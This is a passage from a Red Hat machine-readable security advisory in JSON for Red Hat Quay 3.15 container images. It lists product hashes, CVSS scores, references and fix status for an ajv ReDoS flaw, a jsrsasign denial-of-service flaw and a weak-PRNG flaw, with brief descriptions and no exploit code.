"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ajv: ReDoS via $data reference"
},
{
"cve": "CVE-2026-4598",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-03-23T06:01:47.891452+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2450210"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in jsrsasign. A remote attacker could exploit this vulnerability by providing specially crafted zero or negative inputs to the bnModInverse function within the BigInteger.modInverse implementation. This could lead to an infinite loop, causing a permanent denial of service (DoS) by hanging the process.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jsrsasign: jsrsasign: Denial of Service via infinite loop in bnModInverse function with crafted inputs",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "IMPORTANT: A denial of service flaw was found in jsrsasign. This vulnerability allows a remote attacker to cause a permanent denial of service by providing specially crafted zero or negative inputs to the bnModInverse function, leading to an infinite loop. This affects Red Hat Migration Toolkit for Virtualization and Red Hat Quay, which utilize the vulnerable jsrsasign component.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4598"
},
{
"category": "external",
"summary": "RHBZ#2450210",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450210"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4598",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4598"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4598",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4598"
},
{
"category": "external",
"summary": "https://gist.github.com/Kr0emer/a1bf5cd4547cc630d2dcc5e761de8264",
"url": "https://gist.github.com/Kr0emer/a1bf5cd4547cc630d2dcc5e761de8264"
},
{
"category": "external",
"summary": "https://github.com/kjur/jsrsasign/commit/ca5b027240287a1e71fe63019fc4400332594323",
"url": "https://github.com/kjur/jsrsasign/commit/ca5b027240287a1e71fe63019fc4400332594323"
},
{
"category": "external",
"summary": "https://github.com/kjur/jsrsasign/pull/648",
"url": "https://github.com/kjur/jsrsasign/pull/648"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15370938",
"url": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15370938"
}
],
"release_date": "2026-03-23T05:00:11.571000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jsrsasign: jsrsasign: Denial of Service via infinite loop in bnModInverse function with crafted inputs"
},
{
"cve": "CVE-2026-4599",
"cwe": {
"id": "CWE-338",
"name": "Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)"
},
"discovery_date": "2026-03-23T06:01:34.008562+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
